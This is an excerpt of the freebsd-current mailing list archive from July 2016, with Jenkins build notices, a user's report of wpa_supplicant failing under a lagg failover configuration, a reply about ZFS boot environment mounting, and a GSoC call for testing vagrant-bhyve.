(UTC) Date: Thu, 28 Jul 2016 16:06:47 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <2104648195.42.1469722007754.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1480713631.39.1469712103022.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1480713631.39.1469712103022.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #490 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 16:07:02 -0000 See From owner-freebsd-current@freebsd.org Thu Jul 28 18:49:50 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 6DEDCBA7DFA for ; Thu, 28 Jul 2016 18:49:50 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 604751E38; Thu, 28 Jul 2016 18:49:50 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 7224415B; Thu, 28 Jul 2016 18:49:40 +0000 (UTC) Date: Thu, 28 Jul 2016 18:49:35 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <506266264.43.1469731775206.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <2104648195.42.1469722007754.JavaMail.jenkins@jenkins-9.freebsd.org> References: <2104648195.42.1469722007754.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #491 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 18:49:50 -0000 See From owner-freebsd-current@freebsd.org Thu Jul 28 19:41:50 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 83B57BA7B84 for ; Thu, 28 Jul 2016 19:41:50 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: from mail-qt0-x242.google.com (mail-qt0-x242.google.com [IPv6:2607:f8b0:400d:c0d::242]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 3D1CF1E6E for ; Thu, 28 Jul 2016 19:41:50 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: by mail-qt0-x242.google.com with SMTP id q11so3660093qtb.2 for ; Thu, 28 Jul 2016 12:41:50 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:subject:message-id:mime-version:content-disposition :user-agent; bh=B5x8l5uyuruntoBYzFgAEGxK+8zZP5hUZgfvVu4KwHA=; b=hbdu/nuLZ7kjpzrZLc2tYUIZ7A1Q2NPBuT/VWdL5PlArdlKBnyBEIXchXxhHggx1bh kt2FzUZY5JmHzJC6DHFRX6Cxm14ld90BsB77OzXjjlIXPscOuL6DlAWbXPNZblDF/Mfo nhGaNY7+Vuc/YJcfElypmlblmujSZlrBi5eIjnkkt3n4bN0H872y+6/V8jjbBepP8LZy QqE4y1X9Mq95SbS0aeCLKW1bz4Tk8tlDb9MGYgyJTys/ZpGZZ0QVlnzv6UC5WDFAHKLv /Ca9YW4oYT9RMg0en/XOkKrdSCvafiGxXDUGKcOlLePuUlGmLtOwiCv8qeIfmZf9ZwqA M2hQ== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:subject:message-id:mime-version :content-disposition:user-agent; bh=B5x8l5uyuruntoBYzFgAEGxK+8zZP5hUZgfvVu4KwHA=; b=jhpKmyLr9j0KVLn/v9Uem0CqnLTRgHz0xb8VYRxFwgFk9xmw3NzjWMmQ9LTOMSOUe2 EBXaAzLE/JymDlacmlkVjX3sxm9qjpXd0lVRniE3aMspa71dP9w1+/+SYMoetfsthBwe /1EJPYAAzUdwfqlU7lEmHz55+ld3G0rDW57A2noeyJ6emHs1i0q5+IH1MFmpU3DqtekY vW07b9NYtjscGjhGgyWNJJgzIOg9U2Yw0bFqItspcjE75BUWZ8vvh2A1E7w/t15AjMaa LmflGPC6pCbF9fKyFdeYDVS8KjgZrNq0NJ5bE2GP71LDAi/zhO/Khcq3favBHiEjEMg2 YHKA== X-Gm-Message-State: AEkooutTl8ts/QyvtiQ0snY/W5Dcdg6t8Za4hy7I8wR1u77fpxBUuM9mxF845W4ViluX9g== X-Received: by 10.200.40.235 with SMTP id j40mr57202059qtj.99.1469734909122; Thu, 28 Jul 2016 12:41:49 -0700 (PDT) Received: from gmail.com (c-98-216-247-110.hsd1.ma.comcast.net. [98.216.247.110]) by smtp.gmail.com with ESMTPSA id l129sm8108710qke.27.2016.07.28.12.41.48 for (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Thu, 28 Jul 2016 12:41:48 -0700 (PDT) Date: Thu, 28 Jul 2016 15:41:46 -0400 From: Randy Westlund To: freebsd-current@freebsd.org Subject: wpa_supplicant doesn't work with lagg Message-ID: <20160728194146.GE26793@gmail.com> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="/aVve/J9H4Wl5yVO" Content-Disposition: inline User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 19:41:50 -0000 --/aVve/J9H4Wl5yVO Content-Type: text/plain; charset=us-ascii Content-Disposition: inline I'm having trouble using the lagg driver with wpa_supplicant. When I boot with this standard configuration, my wifi works fine: > # Normal config. > wlans_iwn0="wlan0" > ifconfig_wlan0="WPA DHCP" > ifconfig_em0="DHCP" But when I boot with a lagg configuration, wpa_supplicant can't connect. > # Lagg config. > ifconfig_em0="up" > ifconfig_iwn0="ether 3c:97:0e:46:70:ca" > wlans_iwn0="wlan0" > ifconfig_wlan0="WPA" > cloned_interfaces="lagg0" > ifconfig_lagg0="laggproto failover laggport em0 laggport wlan0 DHCP" The system spends a full 5 minutes during boot trying to send DHCP requests before finally giving up. After boot, ifconfig shows that wlan0 has the right ssid, but the status is 'no carrier': > wlan0: flags=8843 metric 0 mtu 1500 > ether 3c:97:0e:46:70:ca > nd6 options=29 > media: IEEE 802.11 Wireless Ethernet autoselect (autoselect) > status: no carrier > ssid neural_network channel 1 (2412 MHz 11g ht/40+) > regdomain FCC country US authmode WPA1+WPA2/802.11i privacy ON > deftxkey UNDEF txpower 30 bmiss 10 scanvalid 60 protmode CTS > ampdulimit 8k -amsdutx amsdurx shortgi -stbc wme roaming MANUAL > groups: wlan If I then manually kill wpa_supplicant and restart it with the same command, it works fine. > /usr/sbin/wpa_supplicant -s -B -i wlan0 -c /etc/wpa_supplicant.conf -D bsd -P /var/run/wpa_supplicant/wlan0.pid > wlan0: flags=8843 metric 0 mtu 1500 > ether 3c:97:0e:46:70:ca > nd6 options=29 > media: IEEE 802.11 Wireless Ethernet MCS mode 11ng > status: associated > ssid neural_network channel 1 (2412 MHz 11g ht/40+) bssid c4:04:15:90:f5:fd > regdomain FCC country US authmode WPA2/802.11i privacy ON > deftxkey UNDEF AES-CCM 2:128-bit txpower 30 bmiss 10 scanvalid 60 > protmode CTS ampdulimit 64k ampdudensity 8 -amsdutx amsdurx shortgi > -stbc wme roaming MANUAL > groups: wlan /var/log/messages shows: > Jul 28 15:22:09 mako kernel: wlan0: link state changed to DOWN > Jul 28 15:22:09 mako kernel: lagg0: link state changed to DOWN > Jul 28 15:22:09 mako kernel: wlan0: link state changed to UP > Jul 28 15:22:09 mako kernel: lagg0: link state changed to UP > Jul 28 15:22:09 mako kernel: wlan0: link state changed to DOWN > Jul 28 15:22:09 mako kernel: lagg0: link state changed to DOWN > Jul 28 15:22:09 mako kernel: wlan0: link state changed to UP > Jul 28 15:22:09 mako kernel: lagg0: link state changed to UP > Jul 28 15:22:09 mako kernel: wlan0: link state changed to DOWN > Jul 28 15:22:09 mako kernel: lagg0: link state changed to DOWN > Jul 28 15:22:09 mako kernel: wlan0: link state changed to UP > Jul 28 15:22:09 mako kernel: lagg0: link state changed to UP > Jul 28 15:22:09 mako kernel: wlan0: link state changed to DOWN > Jul 28 15:22:09 mako kernel: lagg0: link state changed to DOWN > [snip] > Jul 28 15:22:23 mako wpa_supplicant[329]: wlan0: CTRL-EVENT-SSID-REENABLED id=2 ssid="neural_network" > Jul 28 15:22:23 mako wpa_supplicant[329]: wlan0: Trying to associate with c4:04:15:90:f5:fd (SSID='neural_network' freq=2412 MHz) > Jul 28 15:22:23 mako kernel: wlan0: link state changed to UP > Jul 28 15:22:23 mako kernel: lagg0: link state changed to UP > Jul 28 15:22:23 mako wpa_supplicant[329]: wlan0: Associated with c4:04:15:90:f5:fd > Jul 28 15:22:23 mako dhclient[533]: send_packet: No buffer space available > Jul 28 15:22:27 mako dhclient[533]: send_packet: No buffer space available > Jul 28 15:22:27 mako kernel: wlan0: link state changed to DOWN > Jul 28 15:22:27 mako kernel: lagg0: link state changed to DOWN > Jul 28 15:22:27 mako wpa_supplicant[329]: wlan0: CTRL-EVENT-DISCONNECTED bssid=c4:04:15:90:f5:fd reason=0 > Jul 28 15:22:27 mako wpa_supplicant[329]: wlan0: CTRL-EVENT-SSID-TEMP-DISABLED id=2 ssid="neural_network" auth_failures=7 duration=90 reason=CONN_FAILED > Jul 28 15:22:28 mako login: ROOT LOGIN (root) ON ttyv0 > Jul 28 15:22:31 mako dhclient[533]: send_packet: Network is down > Jul 28 15:23:06 mako last message repeated 4 times This is my hardware: > iwn0@pci0:3:0:0: class=0x028000 card=0x13118086 chip=0x00858086 rev=0x34 hdr=0x00 > vendor = 'Intel Corporation' > device = 'Centrino Advanced-N 6205 [Taylor Peak]' > class = network I know I had this working at one point on 10.2-RELEASE, but recently I've tried both 11.0-BETA2 and 12-CURRENT and get this behavior. Any advice for debugging? --/aVve/J9H4Wl5yVO Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXml/6AAoJEGaweXjzNsmpf/4H/0KF9+DbT039eawxY7H9MDHw 5HxPIhJkUsTOtGBzHDLuKGwUVjDEJlarNJixytui9+o80m7inMk32swIK/AUx4bD bpEaSrJgek2fvDb93v6wiTv8LomnN4AdsVZgI+JW9KvJuAinbURu1xwZ2SP1O2Lb X3iG9RtYULpedWI3wNzvEhnK5/dadaadUCHmSsXh1IhHzrc6bN/i01Wnc2cLHAOh viFEWnY8v/dvjJYzfFYaMh3jzHb5RvNu17tBn+Hu2LuC2mXtEY9xmb/AyNPEZXP5 AYzYmZUfazcwMAY4Xw3Hhsa9CuJojXRMf9xvj+VSXFpxiAAH2KssPZ1BT4rvT2g= =boPm -----END PGP SIGNATURE----- --/aVve/J9H4Wl5yVO-- From owner-freebsd-current@freebsd.org Thu Jul 28 19:48:27 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 00A05BA7CFC for ; Thu, 28 Jul 2016 19:48:27 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: from mail-qk0-x230.google.com (mail-qk0-x230.google.com [IPv6:2607:f8b0:400d:c09::230]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id ABD1B1229; Thu, 28 Jul 2016 19:48:26 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: by mail-qk0-x230.google.com with SMTP id o67so72508172qke.1; Thu, 28 Jul 2016 12:48:26 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:cc:subject:message-id:references:mime-version :content-disposition:in-reply-to:user-agent; bh=521x/Nib9rNLzkMGyLhPLYNgVX1vTy18kFhIJy3kEIk=; b=ZDNG9U0FWL57vJUYfIkHcBly0jc0pfU69Rj2DAtsrtwQxqwlsYHKTrm5lp5mMW296v oOEdCS8mo5YkSIUUjHjwXnIGu0uzAGiYNlyW/isAeelBQ5lH0kQGr3/jCseBiGiQyCWr vR4PjZ0LetQ+ajgFEmNz1kAoNz20T3WOF6V902/0sNl8LMIS5VjLCkyuwlk/xCPcR+H7 3laRzDMda7cz61inDvDMpuz1LYzFCffn0ku2AQPHzOU1cfJ6f9lTNJpwWJehcrfA9veY eHn4cQP0ya4245D8dkackcgrLxgBo8g4gkGniUKzCdOGDRGCOyQQImDVzrCV3WcUOsdn FpIA== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:cc:subject:message-id:references :mime-version:content-disposition:in-reply-to:user-agent; bh=521x/Nib9rNLzkMGyLhPLYNgVX1vTy18kFhIJy3kEIk=; b=luv8G1rWSQqVLVPMtwdWY6eD+WH3nkLRfc4CwATbCG6bBm4NMfwMFrfeNJs+tTqFwx /Cm4LHsMHe/xQhox5xIgUYOaDfUOhv13ucYF8K58YbKMVJrxM5JSleKAxJPeoUfgbvFj Z3fC22j9oqs5xOvyzTDxGevp/msKWf2QwIurlVXCVay/owumSv6gUoJqkY7BYVSwB6BT k3FP9paXqKdMGgUrqv21gJ9bcbIsw4BlSasobqybkXjI49cjCDlHopEb9e23e05AWN8f USx0Ww8L3m7J7aNtBTNspyIQafPv+73DH/xJQpAGbfDPUalZcjBDlWTy9zk1D/Yv9FeU 0EAA== X-Gm-Message-State: AEkoousqsfjjoJIxOATMwSjl75T+NQ2cNUliVxgLt60kmb1xzqa3ZJOspLs6YBksCm8sEw== X-Received: by 10.55.80.68 with SMTP id e65mr43904832qkb.156.1469735305689; Thu, 28 Jul 2016 12:48:25 -0700 (PDT) Received: from gmail.com (c-98-216-247-110.hsd1.ma.comcast.net. [98.216.247.110]) by smtp.gmail.com with ESMTPSA id c15sm8109154qkg.46.2016.07.28.12.48.24 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Thu, 28 Jul 2016 12:48:25 -0700 (PDT) Date: Thu, 28 Jul 2016 15:48:22 -0400 From: Randy Westlund To: Andriy Gapon Cc: Allan Jude , freebsd-current@FreeBSD.org Subject: Re: Boot environments and zfs canmount=noauto Message-ID: <20160728194822.GF26793@gmail.com> References: <20160728020548.GD26793@gmail.com> <5e49ab87-65ff-fe20-1e50-387e3484cc47@FreeBSD.org> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="fCcDWlUEdh43YKr8" Content-Disposition: inline In-Reply-To: <5e49ab87-65ff-fe20-1e50-387e3484cc47@FreeBSD.org> User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 19:48:27 -0000 --fCcDWlUEdh43YKr8 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jul 28, 2016 at 01:34:03PM +0300, Andriy Gapon wrote: > Locally I have the following rc script to handle subordinate datasets of > a boot environment: http://dpaste.com/0Q0JPGN.txt > It is designed for exactly the scenario described above. > The script is automatically enabled when zfs_enable is enabled. >=20 > It would probably make sense to include the script into the OS after > some testing and a review. Awesome, thanks. I'll play with this over the weekend. Maybe someday we'll be able to set something like canmount=3Dwith-parent, which could be like noauto, except that it would mount when its parent mounts. --fCcDWlUEdh43YKr8 Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXmmGGAAoJEGaweXjzNsmpUt8H/jDNczRsyKG7LLrMQAt+OBjz WHcG3mwfIH/4HAu9pYNNXVz2lvPghTZEaqpYdZevPtCTfFJ9c/Ljz6fmwkb7lb/D 3ek6CfVQCLAKLfscM6gkn/TypkwleBT2PmSQQTO4kht8UbHJLfOkvtMCa0rG+jX/ 6JYHyQPj1IJWZegvvw9Ai7Jd43fbqAnu+Tt8vysDuZ9f50AcSfhDfxa/bu6Lgxn2 lmSmSu2a26ctFAVC/z6yO7bFkHUNb1FDyiN965rZIKsSlicL8C+6arskROSnWL5S IzeNUdlhMJpyvIXowZWEG9tq/ERqXaD9yfzyS40dHp74KvEZ0uVFJ/0PNz5/EO8= =iVOh -----END PGP SIGNATURE----- --fCcDWlUEdh43YKr8-- From owner-freebsd-current@freebsd.org Thu Jul 28 21:48:49 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id D909CBA7B62; Thu, 28 Jul 2016 21:48:49 +0000 (UTC) (envelope-from jesa7955@gmail.com) Received: from mail-ua0-f193.google.com (mail-ua0-f193.google.com [209.85.217.193]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 9C98916BB; Thu, 28 Jul 2016 21:48:49 +0000 (UTC) (envelope-from jesa7955@gmail.com) Received: by mail-ua0-f193.google.com with SMTP id 39so3089247uah.0; Thu, 28 Jul 2016 14:48:49 -0700 (PDT) X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:from:date:message-id:subject:to:cc; bh=cLeWsAI4R0tkv5X7+yEUiZpYoQFMzl9nztNTzUW+H94=; b=CdTcLTXnPOn+Hmoj+uu1AUQj4R/de0eMVfez74dLUlTbtN7/fH3bsBJgjAM7ZPbbfo b13NLnD3MAGIM/FJYk4v8TWIu5eEdVdDp+fFlmKDipQ/sjsfTx6Y8ShROpyxdj9gZk2B OAWhzTLrC1ixY5LPQVDkCy7DljRYVBjQl89Z6tNY4Dy+pBoeAac5c8LjZXq7ZT26hdPC oaz6bt8eUijB4VMrslOupD3SxIyA0ffo7DQevO4EwL7nO5Ssir/JzDPth2+FTu0YgDzA z5u1izqzQJO5UfvBxDLj/+HeNxx4ZZJ01R75PdkU4jfWuhDtEQD5KWhXE7CIWOp5BgNW GfLQ== X-Gm-Message-State: AEkoousaBS+lRlTKJsxD2CWAl+ultI8QgTlcFdzY3adBKcYATp4S96vHJ9d2vKkJXZHa/Q== X-Received: by 10.159.39.3 with SMTP id a3mr16418904uaa.62.1469727951443; Thu, 28 Jul 2016 10:45:51 -0700 (PDT) Received: from mail-ua0-f170.google.com (mail-ua0-f170.google.com. [209.85.217.170]) by smtp.gmail.com with ESMTPSA id 40sm1905258uat.9.2016.07.28.10.45.51 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Thu, 28 Jul 2016 10:45:51 -0700 (PDT) Received: by mail-ua0-f170.google.com with SMTP id 35so45050412uap.1; Thu, 28 Jul 2016 10:45:51 -0700 (PDT) X-Received: by 10.176.64.195 with SMTP id i61mr16639949uad.40.1469727951032; Thu, 28 Jul 2016 10:45:51 -0700 (PDT) MIME-Version: 1.0 Received: by 10.159.38.108 with HTTP; Thu, 28 Jul 2016 10:45:50 -0700 (PDT) From: Tong Li Date: Fri, 29 Jul 2016 01:45:50 +0800 X-Gmail-Original-Message-ID: Message-ID: Subject: Call for testing on vagrant-bhyve To: freebsd-virtualization@freebsd.org, freebsd-hackers@freebsd.org, freebsd-current@freebsd.org, freebsd-ports@freebsd.org Cc: Steve Wills , Michael Dexter Content-Type: text/plain; charset=UTF-8 X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 21:48:50 -0000 Hello Everyone, As part of this year's GSoC, we created a project named vagrant-bhyve which enables bhyve as a backend of Vagrant so that we can use Vagrant to manage bhyve VMs. Now most of fundamental functions are working, including booting up a box, providing network access to a box, getting ssh into a box (you can check status in details on GitHub). My mentors and I have done some testes, but we still need more hands to help us find bugs. We also need more users' feedbacks to help us confirm most needed functions other than basical ones and prioritize their implementation. So, please help us. I have documented a step by step guide on how to test vagrant-bhyve, you can follow that. When you find some problems or need some new features, feel free to open an issue. All your testing and feedback will be much appreciated. :) Here is another thing. I am using PF to porvide NAT and port forwarding (thanks to vm-bhyve's hints), but got two problems. One is about PF anthor and another is about port forwarding. I opened two issues for them, please also help me figure out these two problems if you have met them before. Thanks a lot. Best Regards, Tong From owner-freebsd-current@freebsd.org Thu Jul 28 21:50:44 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 08C16BA7D52 for ; Thu, 28 Jul 2016 21:50:44 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id C7DB01B0D; Thu, 28 Jul 2016 21:50:42 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 1B737161; Thu, 28 Jul 2016 21:50:43 +0000 (UTC) Date: Thu, 28 Jul 2016 21:50:42 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <240778904.45.1469742643105.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <506266264.43.1469731775206.JavaMail.jenkins@jenkins-9.freebsd.org> References: <506266264.43.1469731775206.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Build failed in Jenkins: FreeBSD_HEAD #492 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: FAILURE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 21:50:44 -0000 See ------------------------------------------ [...truncated 324090 lines...] [192.168.10.2] out: lib/libarchive/functional_test:test_write_disk_mac_metadata -> passed [0.116s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_disk_no_hfs_compression -> passed [0.106s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_disk_perms -> passed [0.202s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_disk_secure -> passed [0.152s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_disk_sparse -> passed [0.583s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_disk_symlink -> passed [0.129s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_disk_times -> passed [0.119s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_b64encode -> passed [0.148s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_bzip2 -> passed [0.958s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_compress -> passed [0.127s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_gzip -> passed [0.161s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_gzip_timestamp -> passed [0.112s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_lrzip -> passed [0.126s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_lz4 -> passed [0.110s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_lz4_block_dependence -> passed [0.121s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_lz4_block_size_4 -> passed [0.121s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_lz4_block_size_5 -> passed [0.113s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_lz4_block_size_6 -> passed [0.114s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_lz4_disable_stream_checksum -> passed [0.118s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_lz4_enable_block_checksum -> passed [0.099s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_lzip -> passed [0.602s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_lzma -> passed [0.581s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_lzop -> passed [0.121s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_program -> passed [0.134s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_uuencode -> passed [0.171s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_filter_xz -> passed [0.609s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip -> passed [0.659s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_basic_bzip2 -> passed [0.273s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_basic_copy -> passed [0.249s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_basic_deflate -> passed [0.262s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_basic_lzma1 -> passed [0.382s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_basic_lzma2 -> passed [0.394s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_basic_ppmd -> passed [0.330s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_empty_archive -> passed [0.111s] [192.168.10.2] out: 